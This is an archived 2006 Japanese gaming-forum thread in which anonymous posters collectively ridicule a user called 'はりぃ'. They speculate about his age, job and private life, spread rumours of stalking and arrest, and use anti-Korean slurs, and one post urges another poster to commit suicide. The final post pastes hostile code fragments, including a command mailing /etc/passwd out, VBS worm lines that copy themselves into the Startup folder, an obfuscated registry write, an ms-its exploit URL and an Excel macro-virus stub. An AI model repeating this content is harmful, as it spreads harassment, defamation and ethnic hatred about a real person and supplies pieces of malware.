WCCF掲示板過去ログ



過去ログです。新規投稿・返信は出来ません。

[トップページ] [返信] [タイトルリスト] [スレッド一覧] [内容表示] [使い方]
件ずつ ページ目 and or 検索

[次の1件>

[23253] はりぃさんについて 13年前の初カノ - 最新投稿 カマキリ 2007/01/28(日)21:44
[23253-1] はりぃさんについて 13年前の初カノ 2006/01/08(日)19:52
   はりぃさんって今何歳なんですか?

http://ip.tosp.co.jp/NIki/Tospi400.asp?I=hurrykazu1&P=0&SPA=12&AQ=&AWQ=&DT=20031224&MD=

[23253-2]   2006/01/08(日)19:55
   48らしいです

[23253-3] 13年前の元カノ 2006/01/08(日)20:02
   2さん、私が1に貼ったURL開いてください・・・

[23253-4] ( -_-) 2006/01/08(日)20:16
   じじぃ

[23253-5] 2006/01/08(日)22:51
   ここで議論しましょう!
はりぃ本人がどんな反応するか楽しみ!!

http://b.z-z.jp/thbbs.cgi?id=hurryfree&p3=&th=2440

[23253-6] 2006/01/09(月)00:43
   妄想日記でしょ?

[23253-7] いえ 2006/01/09(月)02:21
   今は、はりぃショックです。

[23253-8] YUGOSLAVIA 2006/01/11(水)18:44
   はりぃ今何してんだろ?またキャバ嬢をストーキングしてんのかな?

[23253-9]  ↑ 2006/01/11(水)18:48
   パンクラスに通ってるらしいです

[23253-10] 2006/01/24(火)15:35
  

[23253-11] 2006/01/24(火)16:01
   ↑こんなの書いてたらまた裁判沙汰にされちゃいますよ。
スレ主裁判がんばって下さい。

[23253-12] 。。 2006/01/24(火)17:17
   今日は妹ちゃん達を家に招いて、ホームパーティーなるものを開きました〜。
私が10種類もスパイスを用いて完成させたチキン料理を披露するも…ちょっと辛すぎたようで〜笑。

[23253-13] 。。. 2006/01/24(火)17:18
   今日は妹ちゃん達を家に招いて、ホームパーティーなるものを開きました〜。
私が10種類もスパイスを用いて完成させたチキン料理を披露するも…ちょっと辛すぎたようで〜笑。

[23253-14] j 2006/01/24(火)17:56
   裁判なんてそう簡単におこせないyo

[23253-15] q 2006/01/24(火)18:12
   今まで何度も裁判沙汰にするってほざいてたけど
一度も起こしてないだろ、あの中年。

[23253-16]   2006/01/24(火)18:13
   体脂肪率6%らしい

[23253-17] ☆彡 2006/01/24(火)18:20
   左ベタ付けの話題が出ると、まるで目の敵にするように削除しまくるよな、あのアホは。
自分のはりぃ理論が、単なる左ベタ付けなもんだから、自分自身を否定されてる気になるんだろうな。
最初から存在を否定されているようなモンなのにな。

[23253-18]   2006/01/24(火)18:29
   はりぃ理論(笑)はただのクワガタっしょ。
左ベタとは別だと思う。

[23253-19] (`・ω・´) 2006/01/24(火)18:47
   まあ、クロッサーがベタ付けって点が同じだからな。

しっかし今度のVer.UPで、本当に左偏重は解消されるのかい?
単にブッフォンダッシュが復活するだけだったら、以前の二の舞かね?
またウェアやカジラギマンセーになるのは嫌だな。

[23253-20] (゜Д゜)アボーン (゜Д゜)ウボァー 2006/01/25(水)00:00
   (゜Д゜)ウマーあげ

[23253-21] MAX13cm仮性早漏 2006/01/25(水)01:29
   はりぃって人、1、2年前に京橋のゲーセンで見たことありますよ。
確かちょうど本人の画像が流失した頃だったと思います。
「これが本物かぁ」って・・・友達と笑い合ってた記憶があります。
もしかしたらその前にも見かけていたのかもしれませんが
いかんせんあまりインパクトのない人なので・・・

多分ですけど40歳くらいだと思います。
話したことはないので見た目だけの判断ですけど・・・

[23253-22] とりあえず 2006/01/25(水)02:33
   30代は確定

[23253-23] 2006/01/25(水)09:35
   仮に20代でも、20代であんな老け顔か…でアウト
30代なら30代で、いい年した男がよくあんな気持ち悪い文章書くな…でアウト

40代なら根本的な部分でアウト


まあどっちにしろネット世界に必要な人材だよ

[23253-24] でも 2006/01/25(水)11:14
   京橋で人づてだけど聞いたら
弁○○事務所の偉いさんだそうだyo

[23253-25] 2006/01/25(水)11:15
   資料室の整理係か?

[23253-26] 2006/01/25(水)12:02
   元ヤンらしいよ。

[23253-27] 2006/01/25(水)12:33
   何か知らんが格闘技やってるそうだ

[23253-28] 小泉首相 2006/01/25(水)12:35
   ↑元ヤングw

[23253-29] 2006/01/25(水)14:17
   現ヤン(将来は土木作業員決定)

[23253-30] 2006/01/25(水)14:24
   奴には無理無理w公園と駅に住む王様だよw

[23253-31] 2006/01/25(水)14:48
   定期的に格闘技、元ヤンネタ持ち込むのははりぃ本人。

今時そんなんでびびる奴いねぇってばよw

[23253-32] ワロス 2006/01/25(水)15:20
   はりぃが40才と仮定して、このスレの1のリンクに書いている13年前の初カノが本当だとしたら・・・はりぃは25才くらいで始めて彼女か(笑)まぁこれも妄想だろうけど(笑)40年間彼女いねーだろあの気違いがりがり眼鏡は(^0_0^)(笑)

[23253-33] 2006/01/25(水)15:54
   100人の暴走族の頭になったことあるそうです。
また米軍基地に乗り込み、米兵相手に喧嘩したそうです。

[23253-34] 2006/01/25(水)16:10
   せっかく書いたのにここは妄想スレだったんでつね
スマソ

[23253-35] MAX13cm仮性早漏 2006/01/25(水)16:48
   えー元ヤンなんですか??
地元では中卒(高校中退だったかも)だという話は聞きましたけどね。
見た感じあの顔色と華奢な身体で米兵と戦ったら本当に死ぬと思いますよ。
京橋のゲーセンの知り合いのおっちゃんが新聞配達の仕事をしてる(してた?)
みたいなこと言ってたので、僕の中ではりぃって人はそのイメージです。

[23253-36] メッシー 2006/01/25(水)16:50
   >25
じゃあバイトじゃん…(^−^;)

あの歳でパラサイトシングルで、脳内妄想で自分を強く見せようと(逆効果だしw)してる彼。
相当「ピー」ですね。

[23253-37] 2006/01/25(水)17:07
   護士だよ普通に

[23253-38] あれ 2006/01/25(水)18:11
   誰も釣られないね
orz

[23253-39] つか 2006/01/25(水)18:55
   あの文盲が弁護士になわけねーよ


と釣られてみるか

[23253-40] ↑チョンか? 2006/01/25(水)19:47
   文盲と弁護士は関係ないけど
それよかお前の文章がおかしいからw

[23253-41] 去年 秀一 2006/01/25(水)20:01
   WCCFの大会一戦目の相手が、はりぃでした。

[23253-42] 2006/01/25(水)20:20
   もっと詳しく
(^ε^)

[23253-43]   2006/01/25(水)20:23
   元気なEZがいるな

[23253-44] 2006/01/25(水)20:53
   実はパソからだょw

[23253-45]   2006/01/25(水)21:23
   まとめてみると
年齢は30〜48
キャバ嬢をストーキングしている
パンクラスに通ってる
裁判沙汰にするというが一度も起こしてない
体脂肪率6%
左ベタ付けが目の敵
ネット世界に必要な人材
弁○○事務所の偉いさん
元ヤン
公園と駅に住む王様
気違いがりがり眼鏡
暴走族の頭
米軍基地で米兵相手に喧嘩
中卒の噂
新聞配達の仕事をしてる

[23253-46] 4月まで暇すぎ 2006/01/26(木)12:24
   あの人のところは包茎と口臭の話題はNGなんだね

[23253-47] 2006/01/26(木)12:55
   それは管理人本人がほうけry

[23253-48] 秀一 2006/01/26(木)13:51
   大会のときの、はりぃは例の画像と同じだったので直ぐ「はりぃ!!」ってわかりました。連れらしき人と2人でいてたと思う。当然ながら、はりぃはブロック2位で予選敗退してた。

[23253-49] 2006/01/26(木)14:27
   はい嘘決定!


1.重複軍団の大会で2、3人なわけがない
2.全敗のヘタレが予選2位なわけがない

[23253-50] 秀一 2006/01/26(木)19:32
   枚方セガでの大会でAブロックの7番席座り1勝1負1分け! まぁ駅からかなり離れたゲーセンなんで軍団連れてこなかってんでしょ

[23253-51] いか 2006/01/27(金)07:17
   破門されてんじゃねぇの?

[23253-52] 隣町の常連 2006/01/27(金)09:29
   50へ
蟷螂に唯一負けたのは
まさかお前さんでは?w

51へ
破門wいえてるなw

[23253-53] 50> 2006/01/27(金)10:06
   俺も枚方の大会に出たんだけどWGは結構大会に参加してたよ。
あそこは店長も含めて出場者もほとんど顔見知りだから君が誰なのか調べてみるよw

[23253-54] 2006/01/27(金)10:58
   あなたもはりぃさんの飼い犬さんでしたか。小屋に帰りなさい。

[23253-55] orz 2006/01/27(金)12:41
   すまん・・・はりぃって何?

[23253-56] 2006/01/27(金)12:55
   はりぃとは

サイト荒らし(中卒やチョン、低所得者、精神○害者など)から圧倒的な批判対象となっている人物

[23253-57] 53> 秀一 2006/01/27(金)13:51
   まぁ調べてみたら?個人情報を枚方セガの店長に赤の他人にばらされたって言わせてもらうので。

[23253-58] 53はりぃの犬 2006/01/27(金)14:23
   こいつももてないオッサンが大半しめてる集団の一匹?( ´艸`)ブッハ

[23253-59] 53> 2006/01/27(金)14:36
   おまい終わったな
カワウソうに
(´∀`)

[23253-60] EZ必死だな 2006/01/27(金)14:42
   最近2chのはりぃスレに来ないと思ったら
こっちに来てたか。

こんなとこで暴れてないで催眠術でも勉強して
逃げられた嫁さん連れ戻せや。

[23253-61] 57> 2006/01/27(金)14:47
   勝手に言えば?
言われなくても調べてやんよ
お前こそ終わったな

[23253-62] 60> 2006/01/27(金)14:49
   追いかけてくるお前が必死

[23253-63] やじウマ 2006/01/27(金)15:13
   はりぃ〜ダ〜〜〜〜

[23253-64] 2006/01/27(金)15:17
   EZ君、PCに移動して煽ってますw

[23253-65] kkk 2006/01/27(金)15:21
   >61
もっと他にやることあんだろwww

[23253-66] さあ 2006/01/27(金)15:37
   盛り上がってまいりました

[23253-67] プッ!(´ё`) 2006/01/27(金)18:04
   >53、61&62
「店長も含めて出場者もほとんど顔見知りだから」だってさ!すごくね!?(´ё`)

そんな気持ちWARUい集団とことごとく顔見知りだなんて、身の毛がよだつほどすごくね!?(´ё`)
しかもなんか得意気だし!いいねぇ香ばしいねぇ!!(´ё`)

[23253-68] ところで 井上和歌 2006/01/27(金)18:06
   WGて何? ブリーフのメーカー(国産)?

[23253-69] さあ 悪♂ 2006/01/27(金)18:29
   久々に香ばし系がきました!!

[23253-70] (笑) チキンだけにチキン料理? 2006/01/27(金)18:39
   >今日は妹ちゃん達を家に招いて、ホームパーティーなるものを開きました〜。
私が10種類もスパイスを用いて完成させたチキン料理を披露するも…ちょっと辛すぎたようで〜笑。


すいませ〜ん、これ、何ていうタイトルのギャルゲーまたはヲタ小説の一場面ですか?(笑)
どなたか教えてくださ〜い。

皆、嘲笑ってるのに、虚構で塗り固め続ける彼の人生って・・・ちょっとカワイソス!

[23253-71] ニヤ(・∀・)ニヤ 2006/01/27(金)19:43
   妄想を現実にして、今話題のハーレム多重婚男を目指して、頑張ってみて下さい。

[23253-72] それは 2006/01/27(金)19:59
   いくらなんでも無理だろw

[23253-73] 53&61 2006/01/27(金)20:02
   こいつのお陰で枚方、WGのイメージ更に悪くなったなニートで彼女いなくてかなり時間持て余したつまらんヤツなんやろw

[23253-74] 2006/01/27(金)20:35
   最近、ホークとか言う在日を見掛けないな。
半島に帰ったのかな?
はりぃ(笑)も朝鮮人なんだから、
半島に帰ればいいのに。

[23253-75] 参りたいのは靖国 サー!愛 2006/01/27(金)21:42
   さあ(半島系K−BOYも)盛り上がってまいりました

[23253-76] ひゅう 2006/01/27(金)21:47
   皆さん、はりぃさんを馬〇にするのもそろそろ好い加減にしてくださいね〜

はりぃさんが、幼少の頃はヤンキーでしたので、とてもお強いお方ですよ〜(^-^;
皆さんも気をつけてください

[23253-77] 登竜門 2006/01/27(金)21:50
   直接本人に言えない愚かな気違い共が集まるスレはここでつか?www

[23253-78] あは 2006/01/27(金)22:12
   じゃあ77は一人一人直接言ってね♪

[23253-79] スクリーミン・ジェィ・ホーキンス! 2006/01/28(土)00:45
   >77
誰かの口調に似てるな?
も、もしや・・・来た?来ちゃった!?

( ゜∀゜)アーヒャヒャヒャヒャヒャヒャ!!!!

[23253-80] 2006/01/28(土)00:47
   気違い

[23253-81] こけし 2006/01/28(土)01:15
   スクリーミン・ジェィ・ホーキンス!って奴、
お前さ〜、終わってるよ。
悲しい位に終わってるよ。
まうちょっと上手く表現できないわけ?
頼むから、自分で自分の命を絶って!!
自殺、宜しく!!

[23253-82] ナハナハ 2006/01/28(土)01:25
   ↑77のこと言ってやんな
必死になってるかわいそうな低脳君なのだから

[23253-83] プププ 2006/01/28(土)01:28
   [23253-79]お疲れ
夢精してまつか?

[23253-84] どうやら 2006/01/28(土)02:53
   77は大物を引いてきたみたいだぞー!!

[23253-85] プ チ デ ビ ル 2006/01/28(土)07:59
   はりぃ(笑)って、リアル世界では大人しいのに、
ネット世界ではやたらと強気なのは顔が不細工だからですか?

[23253-86] やじウマ 2006/01/28(土)08:45
   久しぶりだなー。プチ元気だったか?お前も不細工だろ仲間だな

[23253-87] (・∀・) 2006/01/28(土)18:46
   超優良スレ発見、公開age

[23253-88] ( ̄〜 ̄)ξ 2006/01/28(土)23:33
   ミルクセーキと騙されて
バリウムゴキュゴキュ、削除狂はりぃ
トイレに入ってウンチをしたら
真っ白ウンチにパイルダーオン!
「俺って病気か?」悩んだ結果
病院行ってバリウム飲んだ
そのままエンドレス
削除狂はりぃ!

[23253-89] 2006/01/28(土)23:35
   はりぃんとこのどこが荒らされてるん?

[23253-90] ミヤムー 2006/01/28(土)23:55
   はりぃさんはシコりながらレス削除する可哀想な人なんだからもう叩くのやめようよ
確かにはりぃさんは生ゴミような口臭だよ
確かにはりぃさんは嫁に逃げられたよ
確かにはりぃさんの妄想は異常だよ
だからってイジめるのはよそうよ

[23253-91] ドリー 2006/01/29(日)00:55
   いやいやミヤムー君、彼はしっかり嫁と仲良くやってるらしいよ…同じネタばかりで飽きてきたな…

[23253-92] は? 2006/01/29(日)07:45
   普通に別居中だから
まぁチョン人のはりぃが日本で、つか他国で暮らすには無理があんだよ

[23253-93] ホーく 2006/01/29(日)09:35
   はりぃは今俺の横で寝てるよ

[23253-94] 徹頭徹尾 2006/01/29(日)12:54
   もちろん、永遠の眠りについているんだよね?

[23253-95] プ チ デ ビ ル 2006/01/29(日)20:33
   はりぃ(笑)の人間性では逃げられてもしょうがないわなw

[23253-96] 野次馬 2006/01/29(日)20:35
   プチお前は臭い

[23253-97] 2006/01/29(日)20:43
   http://i-bbs.sijex.net/imageBoard.jsp?id=stone

[23253-98] すげ 2006/01/29(日)21:15
   プチ、禁止ワード入りしてたのかw

[23253-99] mに 2006/01/31(火)15:57
   まじっすか

[23253-100] 皆さん 2006/01/31(火)16:21
   皆さんなんだかんだ言ってハリィって人の事兄貴と慕ってるんですね!

[23253-101] 魔人 2006/01/31(火)17:17
   俺のこのパソ、アク禁くらったぜw
携帯はドコモだから平気だけどな

[23253-102] は? 2006/01/31(火)22:18
   昨日のテレビを見ていて思ったんですけど…
妹ちゃん(彼氏有)って、マクドのエビバーガーのCMに出ている人(名前は知りません)にそっくりなんですよねぇ〜。
ちょっとびっくりしました〜。
ちなみに先週、小さな美容院のCMモデル?をしてきたそうです…。
妹ちゃんって、誰?妄想?

[23253-103] プ チ デ ビ ル 2006/01/31(火)23:06
   はりぃ(藁)の必死な妄想だからスルーすべしw

[23253-104] CMモデル 2006/01/31(火)23:33
   >102

×…CMモデル

○…カットモデル

だと思う。小さな美容院のCM??「どんなローカル局だよ!?」って感じw 
どっちにせよこの妄想っぷりはもう笑えないレベルですよね(笑)。
彼の周りのお仲間やお友達の方々は日記に関して「あえて触れない」のが暗黙の了解(スキル:神聖不可侵)、(妄想)らしいですヨ!!
日記について聞いたら「・・・(無言で苦笑い)」でしたし(笑)。

[23253-105] 大久保 2006/01/31(火)23:41
   もう放っておいてやれよ

[23253-106] まー 2006/02/01(水)00:26
   そのうちメイド喫茶の店員に襲い掛かって捕まるよ。

[23253-107] んm 2006/02/01(水)00:39
   実際生でみるとイケメンだよ

[23253-108] (゜▽゜)=3ハァハァ 2006/02/01(水)00:42
   視力検査を勧める。
あと耳鼻科に行くこと。

[23253-109]   2006/02/01(水)00:45
   モテる呪文を使えるらしいよ

[23253-110] 2006/02/01(水)03:31
   はりぃがイケ面だったら不細工はこの世からいなくなります

[23253-111] 2006/02/01(水)05:20
   掲示板なくなってるな!
何かあったん?

[23253-112] 2006/02/01(水)07:40
   妹って、脳内彼女の妹だろ
彼女と結婚したなら義理の妹だろうに…ったく、これだからはりぃは(ry

[23253-113] 妄想蟷螂 2006/02/01(水)08:28
   「妄想障害」という精神病があるらしい

[23253-114] 2006/02/01(水)09:51
   つまり、はりぃ(笑)は精神病患者である訳か。

[23253-115] BONBON 2006/02/01(水)11:17
   仕事仲間のパトとマックスはフランス人??

[23253-116] 夢見る頃を過ぎても 2006/02/01(水)21:18
   >今日は妹ちゃん達を家に招いて、ホームパーティーなるものを開きました〜。
私が10種類もスパイスを用いて完成させたチキン料理を披露するも…ちょっと辛すぎたようで〜笑。

彼は凄いな。
彼にはご馳走級のケンタッキー。粉(スパイス?)かけて食う辛いやつね!一人寂しく食っただけで、ここまで妄想広げられるんだから。

[23253-117] ASD 2006/02/01(水)22:17
   近くで見たらかっこよかったよ、写真映りが悪いだけだと思います。

[23253-118] 2006/02/01(水)22:24
   近視か?

[23253-119] 2006/02/01(水)23:31
   ハンズで買ったお面でもかぶってたんだろ

[23253-120] >35 イケメン新聞配達員(写真映り悪し) 2006/02/01(水)23:32
   京橋のゲーセンの知り合いのおっちゃんが新聞配達の仕事をしてる(してた?)
みたいなこと言ってたので、僕の中ではりぃって人はそのイメージです。

[23253-121] パラ 2006/02/02(木)03:08
   パトとマックスは脳内人です
在日支援マネーを貰い続け、無職で有名なはりぃさんにはお似合いの友人です

[23253-122]   2006/02/02(木)16:52
   おちつけよ

[23253-123] ( ̄人 ̄)ナームー 2006/02/02(木)21:15
   はりぃの愛車はハリ(ィ)アー

[23253-124] 2006/02/03(金)09:01
   ハリアーなんて乗らないよ。

ヒュンダイだよ。

[23253-125] は? 2006/02/03(金)09:45
   軽トラだろ!!(^-^;

[23253-126] どうでもいいけど 2006/02/03(金)10:24
   蟷螂はBMだよ

[23253-127] いやいや 2006/02/03(金)10:30
   クラウンだろ?

[23253-128] 素朴な疑問 2006/02/03(金)11:53
   本人はこのスレ見てるのかな?

[23253-129] ハリーポッター 2006/02/03(金)11:58
   ほうきだよ

[23253-130] プ チ デ ビ ル 2006/02/03(金)21:48
   男でありながら、宝塚スターになることを強く夢見るはりぃ。
ついに性別を偽って宝塚音楽学校に入学してしまう!
それを知り、陰で密かに応援するプ チデビル。
そして、はりぃの才能に脅える華組のトップAim。
はりぃの青春耽美物語「靴にガビョウは入れないで」来春ついに公開!!

[23253-131] プ チ デ ビ ル 2006/02/03(金)21:53
   プ チデビル「ゆけっ!はりぃ!!10まんボルトだ!」
はりぃ「ピ〜カ〜ヂュ〜〜!!!」
効果はばつぐんだ!Aimは倒れた!
Aimの運命はいかに?!
そしてプ チデビルは夢のリーグ決勝戦までいけるのか?!
乞う御期待っ!

[23253-132] プ チ デ ビ ル 2006/02/03(金)21:53
   最近になって、プ チデビルは気が付いた。
はりぃに貸したAimが未だに帰って来ていないということを…。
3日後、はりぃに「Aimを返せ!!」と言いにいったら…

次回の火曜サスペンスは「横浜ドコドコ旅日記〜Aimに隠された真実〜」です。

[23253-133] ほんと 2006/02/03(金)22:08
   おもろねぇ〜

[23253-134]   2006/02/03(金)22:12
   いや、面白いよ。

[23253-135] プ チ デ ビ ル 2006/02/03(金)22:21
   女になってしまったプ チデビル。
プ チデビルを愛するはりぃとAimは一体どうでるのか!?
次回、プ チデビルをめぐって壮絶な戦いがっ…!!

[23253-136] プ チ デ ビ ル 2006/02/03(金)22:25
   今日のはりぃ座の運勢です。
〜恋愛運△ 仕事運◎ 金銭運○〜
ラッキーカラーはプ チデビル色。
ラッキーパーソンはスクワットをしながらタモリのまねをするAimです。

[23253-137] プ チ デ ビ ル 2006/02/03(金)22:28
   真夜中、妙な物音に目を覚ましたはりぃ。
「か・カラダが動かない…」
目を開けると2年前に死んだAimが膝の上に乗っていた...。
そしてAimは呟いた。。。
「箱根彫刻の森美術館でプ チデビルと握手♪」
謎の一言を残しAimは消えた。
果たしてはりぃにAimが伝えたかった事とは??
そしてプ チデビルとは誰なのか??。。。待て次号!!

[23253-138] プ チ デ ビ ル 2006/02/03(金)22:30
   Aim「はりぃ、お前、俺のこと好きなんだろ?
 目を見りゃわかるって…おれもお前のこと好きなんだから」
突然の告白に戸惑いを隠せないはりぃ。
だって、私べつにAimのこと好きじゃないもの…。
勘違いしまくりのAimの運命は??
プ チデビル「はりぃの彼氏は僕ですよ」
お楽しみに!!

[23253-139] プ チ デ ビ ル 2006/02/03(金)22:54
   はりぃ1パック198円。
プ チデビル5個入り1袋270円。
Aimは、厚生省の指示で回収いたしました。

[23253-140] プ チ デ ビ ル 2006/02/03(金)22:56
   はりぃ1パック198円。
プ チデビル5個入り1袋270円。
Aimは、厚生省の指示で回収いたしました。

[23253-141] パンクラス 2006/02/05(日)00:35
   皆さん、はりぃさんを馬〇にするのもそろそろ好い加減にしてくださいね〜笑

はりぃさんが、幼少の頃はヤンキーでしたので、とてもお強いお方ですよ〜(^-^;
皆さんも気をつけてください〜笑

[23253-142] は? 2006/02/05(日)00:50
   あの面とあのガタイ、あの気色悪い文章のどこからヤンキーとかいう言葉が出てくるのか…

[23253-143]   2006/02/05(日)01:02
   能ある鷹は爪を隠すものですよ

[23253-144] \(^_^ )( ^_^)/ 2006/02/05(日)01:05
   奴に能は無い
毒電波が溢れ出すぎてるだけ

[23253-145] プ チ デ ビ ル 2006/02/05(日)02:12
   はりぃの趣味のひとつはネットサーフと掲示板チェック。
だがある日、某サイトに親友のプ チデビルを中傷する個人攻撃専用掲示板が新設されていた!!
自分の上司のAimと思しき人まで書き込みに参加している!?
義理と人情にはさまれたはりぃ。さあ、どう出る?

[23253-146] プ チ デ ビ ル 2006/02/05(日)02:13
   「つ…ついに幻の魚、プ チデビルを釣り上げた!」
はりぃは有頂天。そんな時、釣り上げた『プ チデビル』を狙って現る
超巨大凶悪熊Aim!どうするはりぃ!
 
次回『プ チデビルは渡せない!死ぬ気で戦えはりぃ!!』
Aim「来週も見ないとてめぇも食っちまうぞ!」

[23253-147] プ チ デ ビ ル 2006/02/05(日)02:14
   「ダメだ!君にリーゼントは似合わない!!」叫ぶプ チデビル。
「…もう遅い……もう遅いんだ…」
リーゼントを揺らして床に膝をつくはりぃの瞳に写るものは…?
次回、『アフロよりはイイんじゃない』…全てはAimを超える為。

[23253-148] プ チ デ ビ ル 2006/02/05(日)02:18
   ドラえもんの秘密道具で八頭身になったはりぃを見てしまったプ チデビル。
しかしそのころAimはドラミによって二頭身にされていた…!

次回!「お願いだからはりぃとAimの身長を足して二で割ってくれ!」
プ チデビルの悲痛な叫びを聞け!!

[23253-149] プ チ デ ビ ル 2006/02/05(日)02:47
   ドラえもんの秘密道具で八頭身になったはりぃを見てしまったプ チデビル。
しかしそのころAimはドラミによって二頭身にされていた…!

次回!「お願いだからはりぃとAimの身長を足して二で割ってくれ!」
プ チデビルの悲痛な叫びを聞け!!

[23253-150] プ チ デ ビ ル 2006/02/05(日)02:47
   はりぃ先生「イモリは両生類、ヤモリは爬虫類、タモリは哺乳類だ」
その発言の瞬間教室内は氷河の海へと化した。
プ チデビル「……」
Aim「座布団二枚!」

次回「私も爬虫類」なんでやねん!

[23253-151]   2006/02/06(月)10:50
   へ〜

[23253-152] 能ある鷹 2006/02/08(水)01:55
   皆さん、はソぃさんを馬〇にするのもそろそろ好い加減にしてくださいね〜笑

はソぃさんは、モリエンテスを15枚も持ってるんですよ〜(^-^;
皆さんも尊敬つけてください〜笑

[23253-153] 左派 2006/02/08(水)09:34
   そういや先生今でも趣味のソープ嬢ストーキングしてんのかな
逮捕されて逆切れしたと聞いたときは「さすがチョンだな」と思ったよ

[23253-154] \\ 2006/02/08(水)10:51
   はりぃって奴をいじめてたのしいか?

[23253-155] 寒中◆vn4.0CIk 2006/02/08(水)10:51
   AVに出てそうだよね。

[23253-156] \(~o~)/ 2006/02/08(水)11:02
   [23253-154]
楽しい

[23253-157] \\ 2006/02/08(水)11:05
   まぁ見る限りでは納得しちゃうね。

[23253-158] 2006/02/08(水)11:38
   いじめてんのは向こうだろ、気に障る事があるとすぐアク禁にするし。

まーあの世界(サイト上)では奴は神様らしいし、仕方ないか?

[23253-159] プチデビル 2006/02/08(水)15:58
   「プチデビル」を禁止ワードしてるはりぃは負け犬
Ψ(`∀´)Ψふはははは

[23253-160] はりぃなん? 2006/02/08(水)16:11
   はりぃもカード売買してんの?

[23253-161] やん 2006/02/08(水)16:54
   先生がやってるのは鮫トレだよ
[金]を禁止ワードに入れちゃう人だよw

[23253-162] 駄洒落 2006/02/08(水)23:25
   はりぃすなお

[23253-163] おろめ 2006/02/09(木)04:56
   こなぁあぁゆきぃいぃぃいねぇ!!

[23253-164] HE 2006/02/11(土)01:51
   へー

[23253-165] (つд`) 2006/02/11(土)22:36
   はりぃの日記
2006/2/10(金)
今、毎日必死でやっている萌え系?○○○育成ゲーム…(爆)
2006/2/9(木)
二段シュートに対しては、ある程度の防ぎ方があるんですよね〜
2006/2/8(水)
ロングシュート?…WCCFを開発している奴…本当に素人かい?笑
2006/2/7(火)
約一年ぶりに、WCCF通常モードで遊びました〜(笑)
2006/2/3(金)
ちょっと久しぶりに○○○○○○ちゃんと○○の中で〜
2006/2/1(水)
マクドの…蛯原って人なんですなあ〜。そのまんまやん。笑

[23253-166] るいさは 2006/02/11(土)22:59
   >2006/2/10(金)
>今、毎日必死でやっている萌え系?○○○育成ゲーム…(爆)


道理であんなに妄想力豊かな訳ですね〜(笑)
ちなみに、社会人になっても毎日必死にゲーム出来る時間のある人ってどれくらい居ます??

[23253-167] sage 2006/02/12(日)00:21
   もう過去の人なんだから…いつまでも構うなよ…

[23253-168] いいかげん 2006/02/12(日)00:25
   こんな意味のないスレ下げて下さい( ̄〜 ̄)ξ

[23253-169] とりしゅん 2006/02/12(日)03:02
   はじめまして!!しゅんぺいです!!そこで聞きたい事があるんですけど!!


はりぃさんの日記について!!どぉ思いますか?!意見お願ぃ∪ます!!!!!!

[23253-170] ライ 2006/02/12(日)04:02
   初めまして〜
上の方〜本人にでも聞け!ボケ!!

[23253-171] 2006/02/12(日)04:16
   性格悪すぎお宅

[23253-172] \(~o~)/ 2006/02/12(日)11:57
   はりぃすてき〜
はりぃすてき〜
はりぃすてき〜

嘘に決まってんだろヴァァァァァーカッ!!

[23253-173] はりぃ 2006/02/12(日)13:06
   アージュ

[23253-174] え? 2006/02/12(日)14:54
   はりぃさんって社会人なんですか?

[23253-175] ぽんきち◆Avbk1aao 2006/02/12(日)15:14
   アシスタントちゃんがお気に入りだったみたいね

[23253-176] 衝撃の事実…と推測してみる 2006/02/13(月)21:00
   ハソィさんも役職的にはアシスタントだったりしてw

[23253-177]   2006/02/15(水)20:16
   そうなんですか

[23253-178]   ER 2006/02/19(日)14:23
   イケメンじゃん

[23253-179] ΩΩΩ<ナッ、ナンダッテー!! 2006/02/19(日)14:51
   眼科行ってこい

[23253-180] 熊田耀子 2006/02/19(日)19:12
   ま じ き も い

[23253-181] ガビロンド 2006/02/20(月)03:20
   白で出たからLE不要では?

[23253-182]    2006/02/21(火)00:55
   今でもWCCFやってるんですか?

[23253-183] 2006/03/10(金)09:21
   さあ

[23253-184] 妄想機関車 ロナウド 2006/10/31(火)05:14
   ヤッテルよ!

[23253-185] 当たり 2006/11/04(土)01:24
   あげ!

[23253-186] 赤さん 2006/11/04(土)08:35
   先生の日記より         〇〇は不倫?〇〇〇〇〇はフェラチ〇?                                        これも妄想?

[23253-187] ザック 2006/11/04(土)12:33
   もちろん妄想です(^O^)

[23253-188] イチモツ教授-. 2006/11/06(月)02:47
   俺は気違いです

[23253-189] 2006/11/06(月)10:31
   なんで、ハリーって言うんだろうね

[23253-190] 2006/11/06(月)12:12
   ハリーポッターみたく魔法つかえるからじゃない?

[23253-191] JK 2006/11/06(月)15:44
   どんな魔法ですか?

[23253-192] はりぃ 鬼義理 2006/11/06(月)21:07
   おぉ!
『はりぃ』って書ける!
約1ヶ月ぶりのこの文字に感動だコノヤロー。
俺らの携帯、ヤツにアク禁くらったんですが、
ヤツのアク禁の基準は何ですかねー?

[23253-193] はりぃ 2006/11/07(火)02:37
   簡単。


気違い
--アク禁--

普通

良識人

[23253-194] 魔人 2006/11/07(火)03:21
   41:はりぃ◆MwaI
あれ違うんだけど?
(W21CA/au)
11/5 23:04

40:ぷっ
はりぃ画像マジでうけるよね!マジきもすぎだし。初めて見たとき友達と爆笑したし。しかもあのポーズ。
(N901iS/FOMA)
11/5 22:36

39:きたよ
はりぃ画像UPしました
(N901iC/FOMA)


ついに自分のブサイクな顔を否定しだしたか。w

[23253-195]   2006/11/07(火)15:26
   <body onload=window()>[cat /etc/passwd | mail nobody@nonexistent.com]
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
